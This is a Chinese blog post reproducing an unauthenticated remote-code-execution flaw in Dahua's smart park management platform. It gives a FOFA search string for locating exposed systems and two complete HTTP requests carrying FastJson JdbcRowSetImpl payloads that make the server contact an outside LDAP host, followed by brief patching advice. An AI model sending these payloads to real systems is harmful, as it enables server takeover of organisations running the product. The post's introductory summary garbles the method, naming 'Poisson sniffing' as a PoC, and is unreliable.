大华智慧园区综合管理平台 RCE漏洞复现
发布时间
阅读量:
阅读量
大华智慧园区综合管理平台是一款具备园区运营、资源调配和智能服务功能的管理平台。然而该平台存在FastJson反序列化漏洞(如/ipms/barpay/pay和/deleteFtp接口),未授权攻击者可通过该漏洞获取服务器权限并执行任意命令。漏洞可通过泊松嗅探(PoC-1)和文件传输协议(PoC-2)进行复现,并已由官方修复(链接:http://dahuatech.corp.dav01.com)。建议用户采取防火墙设置、白名单管理等安全措施以防范此类风险。
0x01 产品简介
大华智慧园区综合管理系统
0x02 漏洞概述
大华智慧园区管理平台系统/ IPMS/BarPay/Pay、DeleteFTP 等接口存在 FastJson 反序列化安全漏洞,在未授权访问的情况下可被利用以发起任意命令攻击并导致被赋予管理员权限或运行恶意代码。
0x03 复现环境
FOFA:app="dahua-智慧园区综合管理平台"
0x04 漏洞复现
PoC-1
POST /ipms/barpay/pay HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close
{"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://dnslog.cn", "autoCommit": true}
AI助手
PoC-2
POST /CardSolution/card/accessControl/swingCardRecord/deleteFtp HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close
{"ftpUrl":{"e":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://dnslog.cn","autoCommit":true}}}
AI助手
验证
0x05 修复建议
建议用户尽快联系厂商进行漏洞修复工作。官方机构已修复该漏洞,请用户主动联系厂商进行漏洞修复工作:http://dahuatech.corp.dav01.com
通过防火墙等安全设备设置访问策略,设置白名单访问。
如非必要,禁止公网访问该系统。
全部评论 (0)
还没有任何评论哟~